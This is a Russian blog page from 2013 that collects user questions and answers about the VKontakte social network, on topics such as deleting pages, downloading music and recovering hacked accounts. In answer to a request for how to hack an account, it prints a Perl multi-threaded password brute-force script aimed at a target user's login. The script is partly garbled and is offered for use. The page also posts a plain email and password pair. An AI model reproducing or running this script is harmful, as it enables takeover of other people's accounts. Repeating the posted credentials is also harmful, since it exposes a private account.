воскресенье, 7 апреля 2013 г.

вопрос про вконтакте....



это зарегистрированные пользователи ВКонтакте, которых ты пригласила через е-меил, или с других соц. сетей!!!

как удалить страницу вконтакте и удалиться из мой мир?

1. Мой Мир. - заходишь на свою страницу, в левом меню жмешь ЕЩЁ - Появиться ссылка НАСТРОЙКИ. Дав на неё. - На открывшейся странице, в самом низу, кнопка УДАЛИТЬ МОЙ МИР 2. Вконтакте. Там чуть по-мудрее, подробней можно посмотреть здесь: Как удалиться из вконтакте

Где можно скачать читы на Вконтакте и Мой мир без вирусов, регистраций и смс? Ответ срочно!

Нигде, иди учи уроки!!!

Кто Даёт бесплатно голоса вконтакте

Дайте хотябы 1 голос вконтакте!!

как вконтакте выйти из всех групп сразу?

Или удалить аккаунт

Моя страница вконтакте

E-mail - Molly_Patterson@mail.ru Пароль privet

как поднять рейтинг вконтакте бесплатно?

переспать с админом)

как попрасить разроботчик зделать новые функции в копателе онлайн

Напиши в групу вконтакте и есть шанс что тебе ответят

меня взломали вконтакте!!!!Что делать?

Поменять пароль и посложнее,хотя это не надолго.Незабудьте сообщить друзьям что вас взломали.Если много друзей,спрячьте их,что бы для чужих список друзей был не доступен.

правда ли что соц. сеть Вконтакте была скопировали с анг. Facebook

правда ли что соц. сеть Вконтакте была скопировали с анг. Facebook

У меня проблема, не могу оторваться от соц сети ВКОНТАКТЕ походу я контактофил, что делать? Пожалуйста помогите!!!!

А Я ЗАХОЖУ В КОНТАКТ И НЕ ЗНАЮ,ЧТО ТАМ ДЕЛАТЬ.Хорошо вот ответы мейл ру нашла,хоть поговорить можно.А ЛАЙКАТЬ ПО КАРТИНКАМ,КАК ОНИ МНЕ ТИПА ПОНРАВИЛИСЬ,КАК ТО скучно и неинтересно стало,может и у тебя пройдёт!

я своей девушке говорю давай удалимся из соц сети (вконтакте) она меня любить и.т.д но удаляся не хоч. Нормально ли это

Но она прекрасно понимает что мы соримся из за контакта !

Как вы думаете, если у человека много друзей вконтакте, это значит, что он популярен и очень общительный?

контакт не показатель одно точно что он много времени проводит за монитором да разве это друзья которых в жизни не видел не разу.писать можно все сто угодно а при живом общение тишину ловитью

Как разблокировать сайт ВКонтакте?

регистрациявход Код активации: Добро пожаловать В связи с многочисленными регистрациями анонимных анкет и увеличением уровня спам-рассылок на сайте теперь каждая анкета подлежит обязательной активации. Вот тескт при попытке авторизироваться; Для того чтобы активировать свою анкету, отправьте бесплатное SMS с текстом 252127 на один из следующих номеров: 3352 для абонентов России; 7139 для абонентов Украины; С уважением, администрация ВКонтакте. В Контакте © 2006-2010 РусскийУкраїнськаБеларуская (тарашкевiца)EnglishСрпскиMagyarAzrbaycanвсе языки » Помогите!!! Что делать???

Здравствуйте. Я не могу скачать Видео в контакте. Он выдаёт ошибку при нажатии скачать, Он пишет что странница не найден

Это глюк программ для скачивания из вконтакта. Попробуйте Maxthon 3, он легко скачает оттуда - все просто, смотри ролик: http://video.mail.ru/mail/cheeseboy/4/11...

Почему уже три дня не могу зайти вконтакте На все другие сайты захожу спокойно!

у них там вроде с электрикой была беда, сервер обесточился один, потом видать восстановительные работы начались...

Что с сайтом Вконтакте?

контакт работает нормально но если вам закрыли доступ попробуйте следующее почиститй историю и кэш,потом вот это попробуй http://support.microsoft.com/kb/972034 если заблокировали попробуй зайти отсюда http://dostupest.ru/ или http://antizapret.ru/ и желательно просканировать вебом http://www.freedrweb.com/cureit/?lng=ru и поменять пароль вместе с контрольным вопросом или откати систему до того дня когда все работало нормально

Как передать голоса Вконтакте на счет приложения? К примеру в приложении Пкемоны.Любимые питомцы.??

там вкладка должна быть нажмешь обменять голоса и т.д или вкладка банк!!!

меня взломали вконтакте а востоновить я ее немагу потомушто я потерял телефон с симкой на который была зарегистриравана

и вконтакте а востоновить я ее немагу потомушто я потерял телефон с симкой на который была зарегистриравана страница а по второму способу я пробывал администрация отключила мою заявку на вост страницы

Сайт ВКонтакте... восстанавливает пароль только по телефону.. А что делать, если сим-карта уже дапвно выкинута? Спасибо!

нужно менять номер в контакте. Но там что бы поменять номер нужно кажется 2 недели ждать.

А ты на каких сайтах еще общаешься?

вконтакте и в моем мире, с теми кого знаю от школы до работы и увлечений

как сделать вконтакте чтобы люди не добавляли меня в друзья , а чтобы сразу подписывались??

никак, и смысла нет) когда они висят типа добавляются (ждут когда ты их добавишь) они уже подписаны

Программа для скачивания в вконтакте музыки LoviVkontakte. как думаете стоит ли скачать?

незнаю !но легче и проще установить расширение в браузере гугл.можно будет и видео качать вконтакте:) я доволен прогой!

Бесплатно ли ВКонтакте создавать группы?

При попытке создать группу просят послать сообщение. Вопрос: это сообщение бесплатно?

Как удалить страницу вконтакте?

входишь на свою страницу-там слева настройки- листаешь вниз и надпись Вы можете удалить свою страницу жмешь на эту надпись

как добавить моного друзей вконтакте бесплатно скажите а то можна киньте сылку на прогу

не спам-ботов никак

как познакомиться с конкретным человеком вконтакте?

как говорят, не забывайте про предварительные лайки))) откомментируй что-нибудь на ее странице остроумно и смешно, она отреагирует и сама напишет) но здесь есть риск облажаться и написать какую-нибудь фигню, и тогда она закроет комменты)) так что будь бдителен и осторожен) удачки!

Как делать комиксы так как вконтакте?

ищите в группах ссылку на создание комиксов, или в поисковике наберите создать комиксы мемы троллфэйс или что нибудь такое.

Как скачать музыку с вконтакте? (vksaver не работает)

Если пользуешься google chrome или что-то на подобии него, то в интернет-магазине google есть масса бесплатных приложений для скачивания аудио и видео файлов именно с

Посоветуйте какието игры Вконтакте кроме вормикса

Тюряга, Армейка

Помогите. Вконтакте создал группу 70 человек Вопрос как сделать так чтоб участники могли подписываться на обновления!!

тебе не надо было группу создавать , а создать официальную страницу. как это сделать заходишь в группы создать сообщество и там ниже будет надпись ,(создать официальную страницу. )

скажите как отмечать в отмечалке друга в вконтакте

А ВКонтакте есть Вероника Никитина?

В Контакте, как собственно и в Греции, есть абсолютно всё!!!

Помогите выбрать ник в соц сеть Вконтакте

эм ну что,единственное нужен ник с рифмой ну как бы сказать более звучащий нормал читающийся) к примеру Иван Микс ну что то наподобии ниже напишу варианты можете свои посоветовать написать в комментах я надеюсь на вас))эм ну и посоветуйте еще какие нибудь псевдонимы,заранее большое спасибо вам пользователи сети Маил)

голоса ВКонтакте. через какие приложения Вконтакте можно бесплатно получить голоса?

Вконтакте-приложения-голоса-ПОИСК!!!

онлайн колонка вконтакте! есть ответ!!!

!!!

Вконтакте не работает - БЕГОМ НА ОТВЕТЫ. Ну, что скажете, почему ошибка сервера? Дурову по ушам надавали?

Дуров отказался сотрудничать с ФСБ и не закрыл сообщества,посвященные незаконным выборам)

Накрутка участников в группу Вконтакте. Какие рабочие программы?

Никакие.

Я загрузила видео ВКонтакт, но оно обрабатывается уже 2 часа. Скорость инета 100мб/с. Браузер Chromium. Что делать?

Видео обрабатывается не на твоем компьютере. Когда оно грузится на серверы вконтакте оно обрабатывается именно ими. Представь сколько миллионов роликов в минуту выкладывают? Поэтому просто нужно ждать.

Помогите с контактом! Как вконтакте мне качать музыку?

я бы не советовал качать любую уже из здесь перечисленных....я лично таким прогам не доверяю ...что я осмелился проверить так это только одну . называется vkopt. net

группа в ВКонтакте. скажите-как создать группу в ВКонтакте? Спасибо за ответы

зайди в свой группы, вверху под поиском есть сообщества и управление нажми на управление, потом найди создать сообщество

Скачал программу ВКонтакте через iTunes! Не могу найти! Куда он её сохранил???

C:\Documents and Settings\ЮЗЕР\Мои документы\Моя музыка\iTunes - туда он у меня качал - но я ща качаю откуда попало проги - поэтому папка пуста

Подскажите, пожалуйста, где (у кого) заказывают вещи которые потом продают через социальные сети (Вконтакте)? Заранее сп

о чём вы? люди заказывают вещи как на обычных сайтах интернет магазинов так и в контакте идёт всё это наверно со стоков или просто с заграницы

Игра вконтакте что за словоНе могу отгадать слово помогите!(картинка вн утри)

Согласна.Сила

Придумайте готичный статус для сайта ВКОНТАКТЕ?

В бокале вино и в глазах равнодушие, Плыву по течению дыша через раз, Плыву сквозь страдание, плыву сквозь бездушие И катятся слезы невольные с глаз... P.C Стихи моей девушки...

10 баллов за ответ. Ка взломать акаунт ВКонтакте? Очень надо.

use IO::Socket;use MD5;use threads;use threads::shared;my @pass : shared;####################################### C!klodoL# bruteforce with multi-threads######################################$dic = ‘passl.txt’; #словарь паролей$id = 111111; #id цели$mail = ‘mail@mail.com’; #мыло, вместо @ вписать @$threads = 4; #количество потоков######################################open (pass, “create(\Brut, $_);}for(@trl) { $_->join; }sub Brut{while(@pass){$pass = shift @pass;$md5 = MD5->hexhash($pass);$sock = IO::Socket::INET->new(Proto=>’tcp’,PeerAddr=>’’,PeerPort=>80);print $sock “HEAD HTTP/1.0\r\n”.“Host: \r\n”.“Accept: */*\r\n”.“Content-Type: application/x-www-form-urlencoded\r\n”.“User-Agent: Mozillo\r\n”.“Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n”.“Connection: close\r\n\r\n”;$answ = ;close $sock;print “$pass $answ”;if ($answ =~ /302/){open (good, ‘>>good.txt’);print good “$id:$pass:$md5\n”;print “$id:$pass:$md5\n”;close good;exit;}}}goto Next;sub pass{my (@mas);while (){push @mas, $_;last if (@mas == 400);}chomp @mas;return @mas;}

куда перейдёт А. Аршавин ???кто отгадает тому замок вконтакте

Узнал что Аршавин скоро перехотид в другой клуб кто откадает тому замок вконтакте оставте ссылку !

Как узнать,удалил ли человек подарки вконтакте?? В друзьях меня нет,спросить так же не могу.

Давай я добавляюсь посмотрю, давай ссылку

как узнать вконтакте кто посещал вашу страницу? только провериные способы плз

с помощью проги обращайся скину

Есть ли вконтакте такие же прекрасные группы как СММ?

Да есть.

Как узнать какие видеозаписи удалили из группы вконтакте?

следить годами, не отрываясь от компа, сам пробовал)))шучу

А Вконтакте есть группа ТДВ?)))

Сколько получиться 6:2*(1+2)=? 1 или 9 ? )Вчера вконтакте люди спорили, аж на оскорбления перешли))).

1, потому. что сначала делается действие в скобках. потом делается умножение, кажется у него приоритет выше, чем у деления, ну и потом деление только.

как взломать страничку вконтакте

Ни как....

как скачивать видео с сайта вконтакте?

Социальные сети привлекают миллионы людей не только общением, но и возможностью поделится любимой музыкой и клипами. Просмотрев понравившийся клип, иногда хочется сохранить его на свой компьютер, но вот беда, заветной кнопочки «скачать» в социальных сетях нигде нет. В интернете можно найти довольно много программ, в описаниях которых говорится, что с их помощью вы легко и просто скачаете видео и музыку. ***** Программы для скачивания музыки, видео из Контакта ***** Savefrom.net позволяет получать прямые ссылки для скачивания с более чем 40 сайтов, среди которых Vkontakte, RapidShare, YouTube, Rutube, Mail и другие. ***** ВКонтакте.ру Downloader (для музыки, видео и фото) Скачать музыку, видео и фото ВКонтакте. Скачивание в один клик, нормальные имена файлов, отображение размера файлов и битрейта для музыки, скачивание HD видео, скачивание HQ фото. Без спама, без использования вашей учётной записи.

Какие лучшие и самые простые программы для скачивания видео из Вконтакте?

VKsaver Скачать можешь тут audiovkontakte точка ру

Кто токая Марина Громова напишите в поисковике в вконтакте и увидете фото плз скдите кто ето?

Как превратить картинку в граффити(Вконтакте)

никак. можно только довольствоваться теми, что уже были загружены (до того момента, пока баг не прикрыли)

Привет всем. У меня вопрос, где можно найти путешественника, который с радостью будет писать в группе Вконтакте?

У меня вопрос, где можно найти путешественника, который с радостью будет писать в группе Вконтакте? Добавлено 1 год назад цена? no!

Возможно ли сделать человека админом группы вконтакте при том, что он в ней не состоит??? если та, то как???

Возможно ли сделать человека админом группы при том, что он в ней не состоит??? если та, то как??? Сам он не добавится, но мне срочно нужно сделать его админом, без его ведома. Это возможно???

Зачем спамить ВКонтакте? Мол, зайди на сайт... Потом украдут аккаунт и опять спамить. Зачем???

Рекламма двигатель прогресса...сидят по домам и зарабатывают.Про подобные зароботки в инете полно инфы.

Как взломать вконтакте на голоса действещей прогой

дай скайп свой

есть ли немецкий сайт ВКОНТАКТЕ?

вконтакте - мультиязычный сайт. при регистрации из другой страны он обычно правильно определяет язык. если нет - язык можно переключить как при регистрации внизу страницы, так и позже в настройках.

У меня НЕ заходит на сайт вконтакте...когда я нажимаю на ссылку то у меня закрываются все окна браузера..

когда я нажимаю на ссылку то у меня закрываются все окна браузера..я скачала программу для скачивания видео с контакта удалила ее..но уже 2 недели не заходит на сайт!я и на вирусы проверояла вирусов таковых нет,я переустонавливала браузер и все равно не заходит!!!ПОМОГИТЕ ПОЖАЛУЙСТА!!

меня взломали в вконтакте просят потвердить активацию акаунта ответить на смс ,указав свой возраст это пришло смс

...не чего не делать)))..игнор!!!!

как взломать страницу вконтакте????

Вы в курсе что это статья.Да и кто вас будет учить ломать что то бесплатно

и все таки,фейсбук или вконтакте

Вконтакте уже

Вскрыть ВКОНТАКТЕ

можно ли как-то зайти на страницу пользователя ВКОНТАКТЕ, если он ее заблокировал от посторонних глаз, а доступна только для друзей?

как скачать музыку и видео с вконтакте? бесплатно без регистрации и смс

Для Мозилы https://addons.mozilla.org/ru/firefox/ad... Программы Internet Download Manager ЛовиВконтакте VKLife VKMusik http://videosaver.ru/

Как пригласить друга ВКонтакте? не могу найти кнопку пригласить=(

Как зарегистрироваться на сайте ВКонтакте? Теперь нет необходимости отсылать приглашение другу, ведь он сможет самостоятельно заполнить простую форму для регистрации на сайте! Оставайтесь в контакте с любимыми и близкими Вам людьми! Учтите, что при регистрации новой страницы нужно указывать номер телефона.

ВКонтакте

НЕ ЗАХОДИТ В КОНТАКТ… 1.Заходим в Пуск -> Выполнить и в открывшемся окошке вводим %SYSTEMROOT%\system32\drivers\etc\hosts и в открывшемся окошке выберите Блокнот. 2.Когда этот документик откроется в блокноте, посмотрите, если в нём есть упоминания о вконтакте ру (http://vkontakte*.ru) - удалите такие строки. 3.Откройте Поиск и там введите имя файла vkontakte.exe, в дополнительных параметрах укажите Поиск в скрытых файлах и папках и Поиск в системных папках, после чего выполните поиск по всем дискам компьютера. 4.Найденный файл vkontakte.exe удалить. 5.Проверить систему на вирусы антивирусом, предварительно до этого обновив антивирус. 6.Если на шаге 1 не открывается документ %SYSTEMROOT%\system32\drivers\etc\hosts, то выключаем комп, включаем и заходим в безопасном режиме и проделываем шаги с первого по пятый.

Как вы считаете, это нормально вообще, так вот начать общение с человеком?

Сегодня зашел вконтакт (мой ID 51870663), и вижу такое вот сообщение: Мишаня, что с тобой? Просмотрела твою страницу и ужаснулась... У меня простое человеческое счастье, а у тебя, похоже, совсем все сложно... Жаль. А я думала, что ты нашел своё счастье, надеялась. Что ж у каждого своя судьба. я думаю, кто это такой вообще? захожу на ее страницу и вспомнил, ба! так это же моя давняя знакомая, раньше мы дружили с ней, но примерно 10 лет назад перестали общаться и вообще я о ней забыл... а тут написала. И главное, даже Здрасьте не сказала. Ну как так можно? 10 лет не видела человека и даже не написать Здраствуй! Как вы считаете, это нормально вообще? И что она вообще хотела мне сказать этим своим сообщением? Я так и не понял... вот она:

как раскрутить группу вконтакте бесплатно. как раскрутить группу бесплатно дайте ссылку на прогу для рассылки приглашений

есть проги по набивке группы ботами , тупо для количества человек ,не живых людей.

как узнать статистику сообщений вконтакте..только что бы никакие программы не скачивать?)

Мысленно, войти в астрал и посмотреть что там за статистика.

Как удалить свою страницу ВКонтакте и в Майле??? Помогите удалить старые страницы с проектов!Напишите этапы удаления.

на майле: мои настройки- главная страница- да, я хочу удалить свой мир без возможности восстановления. Твой мир будет залокирован в течении 2 суток, когда твой мир удалиться то почтовый ящиквсё равно останеться. Вконтакте: удалить нельзя, просто опусти рейтинг ниже 30%, и забрось её, администрация со временем удалит

какие программы вам извесны для Вконтакте?

мне вот эта понравиласьhttp://files.mail.ru/WK97KF

как получить голоса вконтакте бесплатно? или подарки или рейтинг?

Подарки,если есть голоса подарят друзья,а голоса можно получить отправив смс,правда это дорого!

Как Сделать опросы вконтакте?

В группе заходишь в Редактировать информацию о группе И там находишь сделать опрос и делаешь

где можно найти программу,чтобы качать музыку с сайта вконтакте?

лично у меня стоит VKlife очень удобная,с нее не только можно картинку отправлять,видео скачивать,оставаться в офлайне если надо и еще много много всего. вот ссылка:

Люди!!! ПОМОГИТЕ!!!Вконтакте.ру У меня слева нет напоминания о днях рождения!!! Я нечаенно тыкнула на крестик :( КАК об

ру У меня слева нет напоминания о днях рождения Я нечаенно тыкнула на крестик :( КАК обратно сделать !?

где можно скачать программу массовой рассылки сообщений Вконтакте, что бы без смс и т.п.???

Проще будет написать скрипт самому. А еще проще рассылать руками. 9 из 10 готовых программ для контакта содержат трояны, после установки такой программы с соответствующей вероятностью твои друзья получат от тебя спам, а то и вообще страницы лишишься.

как бесплатно отправлять подарки вконтакте?

был баг недавно можно было через чарлик слать бесплатно подарки но через 30мин пофиксили(

как удалить себя вконтакте?

Сразу нельзя удалить все данные без возможности их восстановить, потому что до 80% просьб о том, что необходимо быстро удалить страницу в контакте часто исходило от мошенников, которые овладевали чьими-то аккуантами. Ведь возможно такое, что забыли нажать кнопку выход где-нибудь в компьютерном клубе, и кто-то решает, воспользовавшись моментом совершить злой умысел – удалить аккуант. И заходя в следующий раз на свою страничку, не обнаружив её, и, следовательно обратитесь в администрацию в контакте, а им бы таких жалоб поступало очень много, и, поэтому, они решили так сделать. Можно попробовать такие способы удалить страницу в контакте... 1. Идем в «Приватность»везде ставим «Только я» через некоторое время появится надпись: «страница удалена…». Также не забудьте отключить все оповещения на всякий случай! И вообще в Настройках убираем все галочки. 2. Начинать активно спамить, материться в популярных группах, на странице Павла Дурова и т.д. такие спам-аккаунты удаляют быстро без разбирательств . 3. Способ №3 — регистрируем новый почтовый ящик. — меняем в контакте е-мейл на новый. — удаляем только что созданную почту. — удаляем друзей, фото, видео, аудио, стену и т.д. — меняем имя и фамилию . — меняем пароль от контакта на произвольный. — в настройках - приватность- меняем все на «ТОЛЬКО Я — выход, через месяц т.к. не заходили вы будете удалены полностью...

есть ли программа. для накрутки голосов вконтакте

Обычно после скачивания и запуска такой * программы* блокируется доступ в соц сети и просят отправить СМС для разблокировки аккаунтов

оформление групп вконтакте

оформление групп в контаке: ава - 5грн / 20руб меню - 10грн / 40руб банер - 5грн / 20руб установка меню - 3грн/12руб полное оформление - 25грн/100руб продажа групп: - 20грн/80руб ___________________________________________ все вопросы в лс

Подскажите пожалуйста, как быть? Меня взломали вконтакте, при смене пароля требуют отправить смс стоимостью 180р.

Единственное, что я тебе посоветую, - не отправляй никаких денег - это не поможет. Чтобы не повторяться, переписывая одно и то же, отправляю тебя сюда. Читай, выбирай свой случай и делай, как советуют. В инете на каждом углу крутят видео, как взломать вконтакте за несколько минут... Лично я после второго взлома послал этот ублюдочный сервис далеко-далеко... Наверное, еще не дошли его хозяева, но дойдут обязательно, конечный пункт указан точно. :))) Куча видео, как взломать вконтакте.

подскажите пожалуйста где мне взять картинки столь популярные вконтакте -это покер фэйс,forever alone,fuck yea и прочие

fffuuu.ru/ lurkmore.ru/Ffruustration изучайте :)

Меня взломали вконтакте!!! помогите зайти на страницу!!!

Я знаю что нужно зайти на диск С, Windows, Sistem_32... а вот как дальше не помню...там должен быть ещё как то файл в формате блокнота, в нем пречислены сайты, необходимо удалить все строчки где написано вконтакте... помогите пожалуйста!!!

Случайно скачала программу для бесплатных голосов вконтакте, удалила, но, видимо, вирус. Что делать?

Случайно скачала на компьютер какую-то программу для бесплатной закачки голосов вконтакте, удалила через несколько секунд. Я так понимаю, какой-то вирус - с того компьютера я не могу зайти в гугл, яндекс или любой другой сервер, отображают ошибки - открывается только контакт, и хотя тулбар отображает, что я не выходила, открывается либо стартовая страница, либо пишут, что я должна отправить сообщение на номер 1161. Отправлять я не собираюсь. Что мне делать, чтобы интернет снова заработал? На антивирус я уже поставила, но тот пока ничего не выдал. У кого-нибудь такое уже было?

как вконтакте в своей группе просмотреть лица тех кто голосовал? если это анонимное голосование

если анонимная,то уже никак

как скачать музыку с вконтакта?? программы не интересуют. желательно, чтобы скинули джаваскрипт код, он у меня был, а т

желательно, чтобы скинули джаваскрипт код, он у меня был, а теперь нигде в инэте не могу найти.

как сделать в группе вконтакте,Такой раздел сезонов.*??

Аудиозаписи/видеозаписи – Редактирование – Новый альбом Чтобы создать альбом для видеозаписей, зайдите на страницу видеозаписей сообщества (публичной страницы или группы) и нажмите Редактирование, затем слева будет располагаться кнопка Новый альбом. Там наберите название альбома и выберите список видеозаписей, которые хотите добавить в данный видеоальбом. Аналогичным образом можно создать видеоальбомы на странице своего профиля.

Если ли сайт,который может помочь скачать видео с вконтакте.ру? VideoSaver.ру НЕ СКАЧИВАЕТ БОЛЬШЕ!

VideoGet.RU | Скачать видео YouTube, из Контакта, ВКонтакте, TNT.Видео AVI, 3GP, MP3, MP4 скачать с youtube, вконтакте, из контакта, vkontakte, rutube, видео mail.ru, tnt, intv, eurosport, google video, tube8. videoget.ru/ Скачать видео с YouTube, из ВКонтакте, Контакта, TNT, Видео Mail.ru Скачать видео AVI, 3GP, MP3, MP4 с ВКонтакте, Контакта, YouTube, VKontakte, RuTube, Видео MailRU, TNT, INTV, Google Video, Tube8, Smotri. convertvideo.ru/

Где можно скачать программу для смайлов вконтакте типо !lol! , fuckyeah!

Вот возьмите http:// depositfiles. com/files/u43jqe7vc Только уберите пробелы.

Как удалить полностью страницу из вконтакта? И как удалить email?

Для удаления Вашего почтового ящика воспользуйтесь СПЕЦИАЛЬНЫМ ИНТЕРФЕЙСОМ(доступен из Вашего ящика).Чтобы попасть в него, необходимо войти в любой Ваш почтовый ящик в нашей почтовой системе.Для удаления почтового ящика :введите в поле Имя пользователя имя почтового ящика, который Вы хотите удалить;выберите соответствующий домен в выпадающем списке (@mail.ru, @inbox.ru, @bk.ru или @list.ru);введите в поле Пароль верный пароль к этому почтовому ящику;нажмите кнопку Удалить, если введенный пароль верный, удаляемый Вами почтовый ящик будет освобожден от содержимого, доступ к нему будет заблокирован, имя удаленного почтового ящика будет свободно не ранее, чем через 3 месяца после удаления ящика.Для восстановления почтового ящика, удаленного Вами или кем-либо, кто знал от него пароль, пожалуйста, пришлите запрос в Службу Поддержки Пользователей.При удалении почтового ящика всё содержимое его удаляется без возможности восстановления.Если доступ в Ваш почтовый ящик был заблокирован нами, за неиспользование в течение 3 месяцев, в соответствии с условиями Пользовательского Соглашения п. 8, и Вы хотите продолжить использовать почтовый ящик с данным именем, введите имя и пароль ящика в форму для входа в почтовый ящик, далее следуйте инструкциям.Источник: http://www.mail.ru/pages/help/2.html#218...Как Удалить Себя Из Вконтакте - 4 Декабря 2008 - Вконтакте - Секреты, утилиты...Уважаемый Гость! Для полноценного использования всех сервисов и......смотреть мою страницу выберете ответ Никто, удалить страницу. После удаления ваши регистрационные данные будут в течении месяца храниться на...www.vitaminart.ru/blog/2008-12-04-13 – 9 Кб

Как отвыкнуть оот компьютера?от вконтакте? от вконтакте?как??

Удалить страницу, отключить интернет хотя бы на 2 месяца. ИСКАТЬ ДРУЗЕЙ В РЕАЛЕ а не на просторах интернета. И поверьте, через 2 месяца вы даже не зайдёте в этот рассадник.

как бесплатно получить голоса вконтакте

никак. голоса это валюта. за валюту можно покупать вещи в том же контактике. А бесплатно ничего не бывает

Где можно вести онлайн дневник?

Вконтакте можно? Через почту рамблера? Если можно подскажите подробно как и где? Спасибо!

Подскажите программу для накрутки участников в группу вконтакте

У меня есть, отдам за 70р.

Отправила человеку голоса вконтакте. можно их как нибудь вернуть?)

нет.Вернуть их нельзя никак. Можно только попросить того человека переслать их обратно вам

А если вконтакте человека добавить в черный список я исчезну у него из СП?

Нет. Можно любого человека, даже Дурова ( даже если ты мужского пола ) в СП добавить.



Комментариев нет:

Отправить комментарий